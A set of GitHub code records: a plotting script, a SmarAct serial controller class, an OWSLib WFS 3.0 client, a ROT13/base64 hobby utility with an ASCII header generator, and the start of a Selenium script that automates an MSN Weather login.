**lfont2)\ntwinax.set_ylabel('Number of publications', **lfont2, rotation=270)\nax7.yaxis.set_label_coords(-0.1, 2)\ntwinax.yaxis.set_label_coords(1.15, 2)\nax7.set_xlabel('% female co-authorship', labelpad=10, **lfont1)\nax8.set_xlabel('% male co-authorship', labelpad=10, **lfont1)\n\n#Set plot titles\nposx=0.51\nposy=0.84\nfor txt in ['Female lead author', 'Male lead author', \n 'Female last author', 'Male last author']:\n fig1.text(posx, posy, txt, ha='center', \n bbox=dict(lw=1, ec='k', facecolor='w', boxstyle='round', \n alpha=1), transform=fig1.transFigure, **lfont1)\n 
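# drop the anchor one panel down so the next title lands on the following row of subplots\n    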
posy=posy-0.193\nfig1.text(0.51, 0.96, \n 'Co-authorship gender composition based on first and last author gender', \n ha='center', **hfont)\n\n#Set twin x axes\nfor ax in [ax1,ax2]:\n twinax = ax.twiny()\n twinax.set_xlim(-5, ((len(bin10)-1)*10)-5)\n twinax.set_xticks([0,10,20,30,40,50,60,70,80,90,100,110])\n twinax.set_xticklabels(l10, tfont, rotation=45)\n\n#Plot and save\nplt.rcParams[\"font.family\"] = fontname\nplt.savefig('output/authorship_lead_last.jpg', dpi=300)\nplt.show()\n# plt.close()\n \n\n#------------------------------------------------------------------------------\n\nprint('Finished')\n","repo_name":"GEUS-Glaciology-and-Climate/Biblyser","sub_path":"biblyser/examples/getStats.py","file_name":"getStats.py","file_ext":"py","file_size_in_byte":19205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"4317449423","text":"import serial\nimport json\nimport time\nimport logging\n\n\nclass SmarActController:\n def __init__(self, com_port) -> None:\n self.com = com_port\n self.ser = None\n self.num_of_channel = 0\n self.max_acceleration = 10E6\n self.max_speed = 100E6\n self.freq_min = 50\n self.freq_max = 18500\n self.status = {}\n logging.debug(\"Loading error codes json\")\n with open('error_code.json') as file:\n self.error_codes = json.load(file)\n logging.debug(\"Error codes json loaded\")\n logging.debug(\"Loading status json\")\n with open('status.json') as file:\n self.status = json.load(file)\n logging.debug(\"Status json loaded\")\n pass\n \n def connect(self):\n try:\n logging.info(\"Connecting to {} serial port\".format(self.com))\n self.ser = serial.Serial(self.com, 9600, timeout=1)\n logging.info(\"Connected to {}\".format(self.com))\n self.num_of_channel = self.get_number_of_channels()\n logging.info(\"Detected {} channels\".format(self.num_of_channel))\n except Exception as e:\n print(\"Unable to connect\")\n logging.critical(\"Unable to connect: \" + str(e))\n raise Exception(\"Unable to connect: \" + str(e))\n return self.connected()\n\n def connected(self):\n return self.ser.is_open\n \n def disconnect(self):\n if self.connected():\n self.ser.close()\n logging.info(\"Disconnected to {}\".format(self.com))\n \n def send(self,command):\n if self.connected():\n self.ser.write(bytes(\":{}\\n\".format(command), 'utf-8'))\n message = self.ser.readline()\n if message.startswith(b':') and message.endswith(b'\\n'):\n message = message.removeprefix(b':')\n message = message.removesuffix(b'\\n')\n message_string = message.decode()\n error = self.error_check(message_string)\n if error[0] > 0:\n print(error[1])\n print(error[2])\n return message_string\n else:\n return None\n \n def status_polling(self, channel:int, target_state, timeout = 60, verbose:bool = True):\n status = self.get_status(channel)\n previous_state = status\n if verbose:\n print(self.status[status])\n logging.info(\"Channel {} status: {}\". format(channel, self.status[status]))\n timeout_elapsed = False\n start_time = time.time()\n while (status != str(target_state) and not timeout_elapsed):\n status = self.get_status(channel)\n if status != previous_state:\n if verbose:\n print(self.status[status])\n logging.info(\"Channel {} status: {}\". format(channel, self.status[status]))\n previous_state = status\n if (time.time()-start_time) > timeout:\n logging.info(\"Channel {} polling timeout elapsed ({}s)\". 
format(channel, timeout))\n                timeout_elapsed = True\n            time.sleep(0.1)\n    \n    def homing(self, channel:int, relative_position, timeout, verbose:bool = True):\n        #drive the given channel toward its target and record the trajectory while polling until it reports stopped (status 0)\n        positions = []\n        time_elapsed = []\n        target_state = 0\n        self.move_position_relative(channel, relative_position, 10)\n        status = self.get_status(channel)\n        previous_state = status\n        if verbose:\n            print(self.status[status])\n        logging.info(\"Channel {} status: {}\". format(channel, self.status[status]))\n        timeout_elapsed = False\n        start_time = time.time()\n        while (status != str(target_state) and not timeout_elapsed):\n            status = self.get_status(channel)\n            positions.append(self.get_position(channel, True))\n            time_elapsed.append(time.time())\n            if status != previous_state:\n                if verbose:\n                    print(self.status[status])\n                logging.info(\"Channel {} status: {}\". format(channel, self.status[status]))\n                previous_state = status\n            if (time.time()-start_time) > timeout:\n                logging.info(\"Channel {} polling timeout elapsed ({}s)\". format(channel, timeout))\n                timeout_elapsed = True\n            time.sleep(0.1)\n        return time_elapsed, positions\n\n    \n    def get_system_id(self):\n        raw = self.send(\"GSI\")\n        logging.info(\"Get System ID: {}\". format(raw))\n        return raw\n    \n    def get_number_of_channels(self):\n        raw = self.send(\"GNC\")\n        raw = raw.removeprefix('N')\n        logging.info(\"Get number of channels: {}\". format(raw))\n        return int(raw)\n    \n    def error_check(self, raw:str):\n        if raw.startswith('E-1'):\n            error_code = raw.removeprefix('E-1,')\n            if error_code in self.error_codes.keys():\n                return [int(error_code), self.error_codes[error_code][\"description\"], self.error_codes[error_code][\"long_description\"]]\n            else:\n                return [int(error_code), \"Error not found\", \"Error not found\"]\n        else:\n            return [0, self.error_codes[\"0\"][\"description\"], self.error_codes[\"0\"][\"long_description\"]]\n    \n    def command_status(self, raw):\n        error = self.error_check(raw)\n        if error[0] == 0:\n            print(\"Command OK\")\n            logging.info(\"Command OK\")\n        else:\n            print(\"Error code: {}\\n {}\".format(error[0], error[1]))\n            logging.info(\"Error code: {}\\n {}\".format(error[0], error[1]))\n            logging.debug(error[2])\n    \n    def write_channel(self, channel:int, command):\n        if channel >= 0 and channel < self.num_of_channel:\n            raw = self.send(\"{}{}\".format(command, channel))\n            return raw\n        else:\n            return None\n    \n    def write_channel_argument(self, channel:int, command, arguments):\n        if channel >= 0 and channel < self.num_of_channel:\n            raw = self.send(\"{}{},{}\".format(command, channel, arguments))\n            return raw\n        else:\n            return None\n    \n    def get_closed_loop_acceleration(self, channel:int):\n        raw = self.write_channel(channel, 'GCLA')\n        if raw is not None:\n            raw = raw.removeprefix(\"CLA{},\".format(channel))\n            logging.info(\"Get close loop acceleration ch{}: {} nm/s^2\".format(channel, raw))\n            return int(raw)\n    \n    def get_closed_loop_speed(self, channel:int):\n        raw = self.write_channel(channel, 'GCLS')\n        if raw is not None:\n            raw = raw.removeprefix(\"CLS{},\".format(channel))\n            logging.info(\"Get close loop speed ch{}: {} nm/s\".format(channel, raw))\n            return int(raw)\n    \n    def get_scale(self, channel:int):\n        raw = self.write_channel(channel, 'GSC')\n        if raw is not None:\n            raw = raw.removeprefix(\"SC{},\".format(channel))\n            part = raw.partition(',')\n            return [int(part[0]), int(part[2])]\n    \n    def get_safe_direction(self, channel:int):\n        raw = self.write_channel(channel, 'GSD')\n        if raw is not None:\n            raw = raw.removeprefix(\"SD{},\".format(channel))\n            logging.info(\"Get safe direction ch{}: {}\".format(channel, raw))\n            
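#reply payload is the safe-direction code (0 or 1), handed back as an int\n            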
return int(raw)\n    \n    def get_sensor_type(self, channel:int):\n        raw = self.write_channel(channel, 'GST')\n        if raw is not None:\n            raw = raw.removeprefix(\"ST{},\".format(channel))\n            logging.info(\"Get sensor type ch{}: {}\".format(channel, raw))\n            return int(raw)\n    \n    def set_closed_loop_acceleration(self, channel:int, acceleration:int):\n        if acceleration >= 0 and acceleration < self.max_acceleration:\n            raw = self.write_channel_argument(channel, 'SCLA', str(int(acceleration)))\n            logging.info(\"Set close loop acceleration ch{}: {} nm/s^2\".format(channel, acceleration))\n            self.command_status(raw)\n\n    def set_closed_loop_max_frequency(self, channel:int, frequency:int):\n        if frequency >= self.freq_min and frequency <= self.freq_max:\n            raw = self.write_channel_argument(channel, 'SCLF', str(int(frequency)))\n            logging.info(\"Set close loop frequency ch{}: {} Hz\".format(channel, frequency))\n            self.command_status(raw)\n\n    def set_closed_loop_move_speed(self, channel:int, speed:int):\n        if speed >= 0 and speed <= self.max_speed:\n            raw = self.write_channel_argument(channel, 'SCLS', str(int(speed)))\n            logging.info(\"Set close loop speed ch{}: {} nm/s\".format(channel, speed))\n            self.command_status(raw)\n\n    def set_safe_direction(self, channel:int, direction:int):\n        if direction == 0 or direction == 1:\n            raw = self.write_channel_argument(channel, 'SSD', str(int(direction)))\n            logging.info(\"Set safe direction ch{}: {}\".format(channel, direction))\n            self.command_status(raw)\n\n    def set_sensor_type(self, channel:int, sensor_type:int):\n        if sensor_type >= 0 and sensor_type <= 56:\n            raw = self.write_channel_argument(channel, 'SST', str(int(sensor_type)))\n            self.command_status(raw)\n    \n    def calibrate_sensor(self, channel:int):\n        raw = self.write_channel(channel, 'CS')\n        logging.info(\"Calibrating sensors ch{}\".format(channel))\n        self.command_status(raw)\n\n    def find_reference_mark(self, channel:int, direction:int, hold_time:int = 1000, auto_zero:int = 0):\n        if (direction == 0 or direction == 1) and (auto_zero == 0 or auto_zero == 1) and hold_time > 0:\n            raw = self.write_channel_argument(channel, 'FRM', \"{},{},{}\".format(int(direction), int(hold_time), int(auto_zero)))\n            logging.info(\"Find reference mark ch{}\".format(channel))\n            self.command_status(raw)\n    \n    def move_position_absolute(self, channel:int, position: int, hold_time: int = 1000):\n        if hold_time > 0:\n            raw = self.write_channel_argument(channel, 'MPA', \"{},{}\".format(int(position), int(hold_time)))\n            logging.info(\"Move position absolute ch{}: {} nm\".format(channel, position))\n            self.command_status(raw)\n    \n    def move_position_relative(self, channel:int, position: int, hold_time: int = 1000):\n        if hold_time > 0:\n            raw = self.write_channel_argument(channel, 'MPR', \"{},{}\".format(int(position), int(hold_time)))\n            logging.info(\"Move position relative ch{}: {} nm\".format(channel, position))\n            self.command_status(raw)\n    \n    def get_position(self, channel:int, no_log = False):\n        raw = self.write_channel(channel, 'GP')\n        if raw is not None:\n            raw = raw.removeprefix(\"P{},\".format(channel))\n            if not no_log:\n                logging.info(\"Get position ch{}: {} nm\".format(channel, int(raw)))\n            return int(raw)\n    \n    def get_physical_position_known(self, channel:int):\n        raw = self.write_channel(channel, 'GPPK')\n        if raw is not None:\n            raw = raw.removeprefix(\"PPK{},\".format(channel))\n            logging.info(\"Get physical position known ch{}: {}\".format(channel, int(raw)))\n            return int(raw)\n    \n    def get_status(self, channel:int):\n        raw = self.write_channel(channel, 
'GS')\n        if raw is not None:\n            raw = raw.removeprefix(\"S{},\".format(channel))\n            return str(raw)\n\n    def set_position(self, channel:int, position: int):\n        if position > 0:\n            raw = self.write_channel_argument(channel, 'SP', \"{}\".format(int(position)))\n            logging.info(\"Set position ch{}: {}\".format(channel, position))\n            self.command_status(raw)\n\n    def get_firmware_version(self, channel:int):\n        raw = self.write_channel(channel, 'GFV')\n        if raw is not None:\n            raw = raw.removeprefix(\"FV{},\".format(channel))\n            part = raw.partition(',')\n            logging.info(\"Get firmware version ch{}: {}\".format(channel, raw))\n            return part\n    \n    def get_serial_number(self, channel:int):\n        raw = self.write_channel(channel, 'GSN')\n        if raw is not None:\n            raw = raw.removeprefix(\"SN{},\".format(channel))\n            logging.info(\"Get serial number ch{}: {}\".format(channel, raw))\n            return raw\n","repo_name":"slaclab/pyMCS","sub_path":"SmarAct.py","file_name":"SmarAct.py","file_ext":"py","file_size_in_byte":12370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}\n+{"seq_id":"729072746","text":"import json\nimport logging\n\nfrom urllib.parse import urljoin\n\nfrom owslib import __version__\nfrom owslib.util import http_get\n\nLOGGER = logging.getLogger(__name__)\n\nREQUEST_HEADERS = {\n    \"User-Agent\": \"OWSLib {} (https://geopython.github.io/OWSLib)\".format(__version__)\n}\n\n\nclass WebFeatureService_3_0_0(object):\n    \"\"\"Abstraction for OGC Web Feature Service (WFS) version 3.0\"\"\"\n\n    def __init__(self, url, version, json_, timeout=30, headers=None, auth=None):\n        \"\"\"\n        initializer; implements Requirement 1 (/req/core/root-op)\n\n        @type url: string\n        @param url: url of WFS root document\n        @type json_: string\n        @param json_: json object\n        @param headers: HTTP headers to send with requests\n        @param timeout: time (in seconds) after which requests should timeout\n        @param auth: instance of owslib.util.Authentication\n\n        @return: initialized WebFeatureService_3_0_0 object\n        \"\"\"\n\n        if \"?\" in url:\n            self.url, self.url_query_string = url.split(\"?\")\n        else:\n            self.url = url.rstrip(\"/\") + \"/\"\n            self.url_query_string = None\n\n        self.version = version\n        self.json_ = json_\n        self.timeout = timeout\n        self.headers = dict(REQUEST_HEADERS)  # copy, so instance headers never mutate the module-level default\n        if headers:\n            self.headers.update(headers)  # dict.update() mutates in place and returns None, so its result must not be rebound\n        self.auth = auth\n\n        if json_ is not None:  # static JSON string\n            self.links = json.loads(json_)[\"links\"]\n        else:\n            response = http_get(url, headers=self.headers, auth=self.auth).json()\n            self.links = response[\"links\"]\n\n    def api(self):\n        \"\"\"\n        implements Requirement 3 (/req/core/api-definition-op)\n\n        @returns: OpenAPI definition object\n        \"\"\"\n\n        url = None\n\n        for link in self.links:\n            if link['rel'] == 'service-desc':\n                url = link['href']\n\n        if url is not None:\n            LOGGER.debug('Request: {}'.format(url))\n            response = http_get(url, headers=self.headers, auth=self.auth).json()\n            return response\n        else:\n            msg = 'Did not find service-desc link'\n            LOGGER.error(msg)\n            raise RuntimeError(msg)\n\n    def conformance(self):\n        \"\"\"\n        implements Requirement 5 (/req/core/conformance-op)\n\n        @returns: conformance object\n        \"\"\"\n\n        url = self._build_url(\"conformance\")\n        LOGGER.debug(\"Request: {}\".format(url))\n        response = http_get(url, headers=self.headers, auth=self.auth).json()\n        return response\n\n    def collections(self):\n        \"\"\"\n        implements Requirement 9 
(/req/core/collections-op)\n\n @returns: collections object\n \"\"\"\n\n url = self._build_url(\"collections\")\n LOGGER.debug(\"Request: {}\".format(url))\n response = http_get(url, headers=self.headers, auth=self.auth).json()\n return response[\"collections\"]\n\n def collection(self, collection_id):\n \"\"\"\n implements Requirement 15 (/req/core/sfc-md-op)\n\n @type collection_id: string\n @param collection_id: id of collection\n\n @returns: feature collection metadata\n \"\"\"\n\n path = \"collections/{}\".format(collection_id)\n url = self._build_url(path)\n LOGGER.debug(\"Request: {}\".format(url))\n response = http_get(url, headers=self.headers, auth=self.auth).json()\n return response\n\n def collection_items(self, collection_id, **kwargs):\n \"\"\"\n implements Requirement 17 (/req/core/fc-op)\n\n @type collection_id: string\n @param collection_id: id of collection\n @type bbox: list\n @param bbox: list of minx,miny,maxx,maxy\n @type time: string\n @param time: time extent or time instant\n @type limit: int\n @param limit: limit number of features\n @type startindex: int\n @param startindex: start position of results\n\n @returns: feature results\n \"\"\"\n\n if \"bbox\" in kwargs:\n kwargs[\"bbox\"] = \",\".join(kwargs[\"bbox\"])\n\n path = \"collections/{}/items\".format(collection_id)\n url = self._build_url(path)\n LOGGER.debug(\"Request: {}\".format(url))\n response = http_get(\n url, headers=self.headers, params=kwargs, auth=self.auth\n ).json()\n return response\n\n def collection_item(self, collection_id, identifier):\n \"\"\"\n implements Requirement 30 (/req/core/f-op)\n\n @type collection_id: string\n @param collection_id: id of collection\n @type identifier: string\n @param identifier: feature identifier\n\n @returns: single feature result\n \"\"\"\n\n path = \"collections/{}/items/{}\".format(collection_id, identifier)\n url = self._build_url(path)\n LOGGER.debug(\"Request: {}\".format(url))\n response = http_get(url, headers=self.headers, auth=self.auth).json()\n return response\n\n def _build_url(self, path=None):\n \"\"\"\n helper function to build a WFS 3.0 URL\n\n @type path: string\n @param path: path of WFS URL\n\n @returns: fully constructed URL path\n \"\"\"\n\n url = self.url\n if self.url_query_string is not None:\n LOGGER.debug(\"base URL has a query string\")\n url = urljoin(url, path)\n url = \"?\".join([url, self.url_query_string])\n else:\n url = urljoin(url, path)\n\n LOGGER.debug(\"URL: {}\".format(url))\n return url\n","repo_name":"chrimerss/CREST-iMAP","sub_path":"python2/lib/python2.7/site-packages/owslib/feature/wfs300.py","file_name":"wfs300.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"26824092867","text":"### DEFAULT HEADER INCLUDE ###\nyourGodTheCreatorOwner='Png Fgriraf '\nETALS=''\n\nimport codecs,base64,time,os,sys,random,datetime,string,shutil;import __main__ as main\nglobal width,bw,bwinner,bwinner_padding,adjust,hz_t,hz_b,hzt_bw,hzb_bw,vl,vr,clt,crt,clb,crb,spa,spa_inner,idt,LnOpn,LnCtn,LnMgn,LnMgn_R,LnMgn_R_spa,lenOf,LnMgnRAdjust,LnMgnR_spa,nl,addLine,brdTop,crnTop,preTxt,postText,borderBottom\nglobal a,b,c,d,e,f,g,h,j,k,l,m,o,q,r,s,t,u,v,x,y,z #in my code, <4 char vars (except i (and n,w,p) which are Reserved) are typically global and extremely volatile. 
stuff that gets set a few times and not read often, gets longer names\nglobal one,two,three,four,five,six,seven,eight,nine,ten\none=None;two=3;three='undef';four=3.4; #etc #underhandedness to trick the Unsuspecting Richardi.\nglobal w,p,fibnum,hours,minutes,difference,mTime\nb64=base64;rot13='rot_13';aDecode=codecs.decode;aEncode=codecs.encode\ndef unrot(string):\n    return aEncode(string, rot13)\ndef rotten(string):\n    return aEncode(string, rot13)\ndef base64dcd(barray):\n    w(aDecode(b64.b64decode(barray), 'utf-8'))\ndef base64ncd(string):\n    w(base64.b64encode(bytearray(string,'utf-8')).decode('utf-8'))\n#macros\nKbInt=KeyboardInterrupt\nmTime = os.stat(main.__file__).st_mtime\nr2e=unrot;e2r=rotten\nb64dc=base64dcd;b64ec=base64ncd;ncode64=b64ec;dcode64=b64dc\nuni2b64=ncode64;b642uni=dcode64\ns=time.sleep;w=print;p=print;q=input; #for a programmer, I'm a very lazy person\ndef ib():\n    r('\\nonq vachg\\n')\ndef bo():\n    w('{')\ndef bc():\n    w('}')\ndef srt(string):\n    w(r2e(string))\nr=srt\n\ndef repl(): #simple read-eval-print loop suite with plenty of functions\n    while(1):\n        try:\n            fr = q(r2e('\\nPubbfr n ERCY: {\\n [E]BG13\\n [O]nfr64\\n [U]rnqre Phfgbzvfre\\n [S]vobanppv Gbbyf\\n ['))\n            if fr == 'R' or fr == 'r': bc();r4e()\n            elif fr == 'B' or fr == 'b': bc();rB64()\n            elif fr == 'H' or fr == 'h': bc();printAttribLn('custom')\n            elif fr == 'F' or fr == 'f': bc();rFib()\n        except KbInt:bc();break\n        except NameError:\n            r('\\nshapgvba haqre pbafgehpgvba')\n            s(1)\n\ndef r4e():\n    try:\n        r('\\nRatyvfu <-> Ebg13 Ernq-Riny-Cevag-Ybbc {')\n        while(1):\n            r(q())\n    except KbInt:bc()\n\ndef fib(n=0,nth=None): #fib backend\n    fibnum=[0, 1]\n    for i in range(2,n):\n        fibnum.append(fibnum[i-1]+fibnum[i-2])\n    if n == 0:\n        return None\n    elif nth is not None:\n        try:\n            w(fibnum[nth-1])\n        except IndexError:\n            b64dc(b'Y2FuJ3QgcmV0dXJuIHZhbHVlIG91dHNpZGUgbGlzdCBpbmRleCBidWZmZXI=')\n    else:w(fibnum)\n\ndef rFib(): #repl fibonacci implementation\n    r('Svobanppv ERCY: ergheaf svefg \"a\" svo ahzoref be \"agu\" svo {')\n    try:\n        while(1):\n            inp=q('\\n: ')\n            if inp.endswith('th'):\n                try:\n                    ip=int(inp.split('th')[0])\n                    fib(ip,ip)\n                except ValueError:ib()\n            else:\n                try:\n                    inp=int(inp)\n                    fib(inp)\n                except ValueError:ib()\n    except KbInt:bc()\n\ndef rB64(): #repl base64 converter\n    try:\n        while(1):\n            inp=q('e[n]code or [d]ecode followed by space then string or bytearray {\\n')\n            inp=inp.split(' ')\n            if len(inp) < 2 or not inp[1]:\n                ib()\n            else:\n                try:\n                    if inp[0] == 'n':\n                        b64ec(inp[1])\n                    elif inp[0] == 'd':\n                        b64dc(bytearray(inp[1],'utf-8'))\n                    else:\n                        ib()\n                except IndexError:ib()\n    except KbInt:bc()\n\n\n###########################################################\n#############################\n####################\n#############\n########\n######\n####\n### BEGIN HEADER GENERATOR\n##\n#\n\nif ETALS: #were there other contributors?\n    AUTHORS=r2e(yourGodTheCreatorOwner) + ', ' + ETALS + ', ' + 'et al.'\nelse:AUTHORS=r2e(yourGodTheCreatorOwner)\n\n##since we're doing centering stuff relative to elements left of them and the far-right margin spacing values _M_U_S_T_!!! 
BE _E_V_E_N_!!\ndef isEven(n):\n    n=int(n)\n    return n%2 == 0\n\ndef toEven(n,rounds=1):\n    #round an odd number up (rounds=1, the default) or down (rounds=-1) to the nearest even int\n    n=int(n)\n    if isEven(n):\n        return n\n    if rounds == -1:\n        return n-1\n    return n+1\n\n#get how long ago the file was modified\ndef calcModDiff():\n    difference = time.time() - mTime\n    minutes = int(difference % 3600 / 60)\n    hours = int(difference // 3600)\n    days = hours // 24\n    weeks = days // 7\n    months = days // 30\n    years = months // 12\n    if hours + minutes == 0:\n        return ' (yrff guna n zvahgr ntb)'\n    elif years > 5:\n        return ' (unys n qrpnqr ntb: png, zneel nyrk!)' # MARRY ALEX!\n    elif years > 1:\n        return ' ({} lrnef ntb)'.format(years)\n    elif years > 0:\n        return ' (n lrne ntb)'\n    elif months > 1:\n        return ' ({} zbaguf ntb)'.format(months)\n    elif months > 0:\n        return ' (n zbagu ntb)'\n    elif weeks > 1:\n        return ' ({} jrrxf ntb)'.format(weeks)\n    elif weeks > 0:\n        return ' ({} jrrx ntb)'.format(weeks)\n    elif days > 1:\n        return ' ({} qnlf ntb)'.format(days)\n    elif days > 0:\n        return ' ({} qnl ntb)'.format(days)\n    elif hours > 1:\n        return ' ({} ubhef ntb)'.format(hours)\n    elif hours > 0:\n        return ' ({} ubhe ntb)'.format(hours)\n    elif minutes > 1:\n        return ' ({} zvahgrf ntb)'.format(minutes)\n    else:return ' ({} zvahgr ntb)'.format(minutes)\n\n#decide a filename\ndef fName():\n    selfFName=os.path.basename(__file__)\n    mainFName=os.path.basename(main.__file__)\n    if main.__file__ == __file__:\n        return selfFName\n    else:\n        return '{} ( <- {})'.format(mainFName,selfFName)\n\ndef printAttribLn(custom=None):\n\n    width = toEven(shutil.get_terminal_size().columns)\n\n    bw=int(.85*width)\n    bwinner=bw-2\n    bwinner_padding=bwinner-2\n    adjust=1\n\n    #texty things to be messed with\n    spa=' ' #ONE character!!\n    spa_inner=spa*bwinner #inner spaces width\n    #indent should be calculated as\n    idt=toEven((width-bw)/2,-1)*spa\n\n    #boxy things to be messed with:\n    #note: some character combinations require different setups here\n    # BOX BORDER STYLES: OCTAL 57 = /, 134 = \\, 137 = _, 174 = |,\n    hz_t='\\137';hz_b='\\137' # horizontal line char! 
top+bottom ### IF UNDERSCORE USE CHARCODE=OCT(137)\n hzt_bw = spa+(hz_t*bwinner)\n hzb_bw = hz_b*bwinner\n vl='|';vr='|' #vertical line left/right :: if symmetrical, just set vr to vl\n clt='/';crt='\\\\' #corner:left top and corner:right top :: / and \\\n clb=crt;crb=clt #in the case of \\ and /, the diagonal corners are the same.\n\n \n #Who doesn't love a bit of ASCII art / styling??\n\n\n LnOpn=[r2e('svyranzr:'), r2e('nhguberq ol'), r2e('ba'), r2e('erqvfgevohgnoyr haqre gur')]\n LnCtn=[fName(), AUTHORS, time.strftime(r2e('%q-%z-%L @ %U:%Z:%F HGP'),time.gmtime(mTime)) + r2e(calcModDiff()), r2e('TAH TCYi3 || ')]\n #manage + control the number of margin in spaces between the body text and right vertical rule\n #mathhhhh\n def calcMgn(lnNum):\n return toEven(bwinner-(len(LnOpn[lnNum])+len(LnCtn[lnNum])),-1)//2\n def calcRMgn(lnNum):\n return (0-(1-(toEven(((bwinner-(len(LnOpn[lnNum])+len(LnCtn[lnNum])))//2),-1))))\n def calcLenOf(lnNum):\n return len(LnMgn[lnNum])+len(LnOpn[lnNum])+len(LnCtn[lnNum])+calcRMgn(lnNum)\n def calcRDiff(lnNum):\n return LnMgnR[lnNum] - (lenOf[lnNum] - bwinner)\n def calcRMgnSpa(lnNum):\n return ((LnMgnRAdjust[lnNum])-adjust)\n #they're not lists, they're arrays.\n LnMgn=[calcMgn(0)*spa,calcMgn(1)*spa,calcMgn(2)*spa,calcMgn(3)*spa]\n #fix a right-vertical-rule alignment bug whose existence I don't understand\n LnMgnR=[calcRMgn(0),calcRMgn(1),calcRMgn(2),calcRMgn(3)]\n #test strings lengths' relation to bw to fix another bug\n lenOf=[calcLenOf(0),calcLenOf(1),calcLenOf(2),calcLenOf(3)]\n LnMgnRAdjust=[calcRDiff(0),calcRDiff(1),calcRDiff(2),calcRDiff(3)]\n LnMgnR_spa=[calcRMgnSpa(0)*spa,calcRMgnSpa(1)*spa,calcRMgnSpa(2)*spa,calcRMgnSpa(3)*spa,]\n testLen=[LnMgn[0] + LnOpn[0] + spa + LnCtn[0] + LnMgnR_spa[0],\\\n LnMgn[1] + LnOpn[1] + spa + LnCtn[1] + LnMgnR_spa[1],\\\n LnMgn[2] + LnOpn[2] + spa + LnCtn[2] + LnMgnR_spa[2],\\\n LnMgn[3] + LnOpn[3] + spa + LnCtn[3] + LnMgnR_spa[3]]\n for i in range(0,3):\n if len(testLen[i]) > bwinner:\n LnMgnR_spa[i] = int((toEven(LnMgnRAdjust[i])-adjust)-(len(testLen[i])-bwinner))*str(spa)\n #concatenate strings\n nl='\\n'\n addLine=[idt + vl + LnMgn[0] + LnOpn[0] + spa + LnCtn[0] + LnMgnR_spa[0] + vr + nl,\\\n idt + vl + LnMgn[1] + LnOpn[1] + spa + LnCtn[1] + LnMgnR_spa[1] + vr + nl,\\\n idt + vl + LnMgn[2] + LnOpn[2] + spa + LnCtn[2] + LnMgnR_spa[2] + vr + nl,\\\n idt + vl + LnMgn[3] + LnOpn[3] + spa + LnCtn[3] + LnMgnR_spa[3] + vr + nl]\n brdTop = nl + idt + hzt_bw + nl\n crnTop = idt + clt + spa_inner + crt + nl\n preTxt = idt + vl + spa_inner + vr + nl\n ### ... 
###\n postTxt = preTxt\n brdBtm = idt + clb + hzb_bw + crb + nl\n\n w('{}{}{}{}{}{}{}{}{}{}{}{}'.format(brdTop,crnTop,preTxt,addLine[0],preTxt,addLine[1],preTxt,addLine[2],preTxt,addLine[3],postTxt,brdBtm))\n ##end def printAttribLn()\n\ndef header(custom=False,prnt=None):\n if prnt:r('Cevagf n phfgbzvfnoyr urnqre jvgu pnyphyngrq naq nqwhfgnoyr znetvaf, qvzrafvbaf, naq nyvtazragf.')\n elif custom:printAttribLn(custom)\n else:printAttribLn()\n#end def header()\nif main.__file__ is __file__:\n header()\n s(1)\n repl()\nelse:pass\n","repo_name":"catb0t/projects-backup","sub_path":"py/old/encodedHead.py","file_name":"encodedHead.py","file_ext":"py","file_size_in_byte":9738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26008065296","text":"import os\nimport ast\nimport time\nimport random\nimport winreg\nimport threading\nimport pystray\nfrom PIL import Image\nfrom datetime import datetime\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\napp_name = \"Visit MSN Weather\"\nsleep = random.uniform(3, 4)\n\ndef visit_msn_weather(task=0, close=True):\n options = webdriver.ChromeOptions()\n options.add_argument(\"--app=https://www.msn.com/en-us/weather/forecast/in-Punjab,Pakistan\")\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n options.add_argument(\"--window-size=1366,768\")\n options.add_argument(\"--window-position=-1366,0\")\n # options.add_argument(\"--user-data-dir=C:/Users/ndmgo/AppData/Local/Google/Chrome/User Data\")\n # options.add_argument(\"--profile-directory=Profile 8\") #user profile option ain't working for some reason\n driver = webdriver.Chrome(options=options)\n wait = WebDriverWait(driver, 60)\n try:\n # Navigate to login page\n driver.get(\"https://www.msn.com/en-us/weather/forecast/in-Punjab,Pakistan\")\n try:\n login_button = wait.until(EC.visibility_of_element_located((By.ID, \"mectrl_main_trigger\")))\n time.sleep(sleep)\n login_button.click()\n email_input = wait.until(EC.visibility_of_element_located((By.NAME, \"loginfmt\")))\n email_input.send_keys(\"ndmgorsi@outlook.com\")\n next_button = wait.until(EC.visibility_of_element_located((By.ID, \"idSIButton9\")))\n time.sleep(sleep)\n next_button.click()\n password_input = wait.until(EC.visibility_of_element_located((By.NAME, \"passwd\")))\n password_input.send_keys(\"microsoft_account_password\")\n\n sign_in_button = wait.until(EC.element_to_be_clickable((By.ID, \"idSIButton9\")))\n time.sleep(sleep)\n sign_in_button.click()\n try:\n stay_signed_in_div = wait.until(EC.visibility_of_element_located((By.XPATH, \"//div[contains(text(),'Stay signed in')]\")))\n checkbox = driver.find_element(By.ID, \"KmsiCheckboxField\")\n if checkbox.is_enabled():\n time.sleep(sleep)\n checkbox.click()\n sign_in_button = wait.until(EC.element_to_be_clickable((By.ID, \"idSIButton9\")))\n time.sleep(sleep)\n sign_in_button.click()\n except TimeoutException:\n pass\n except TimeoutException:\n print(\"Already Logged in\")\n time.sleep(5)\n\n if task == 0:\n time.sleep(5)\n try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[1]\")\n # try_to_click(wait, By.XPATH, \"//*[@id='WeatherLifeIndexEntry-ScreenWidth-c4']/div/div/div[2]/div[2]/div/a[1]\")\n try_to_click(wait, By.XPATH, \"//ul[@class='cardContainer-E1_2']/li[2]/button\")\n 
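#switch the forecast card to its hourly view before stepping through the remaining tabs\n            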
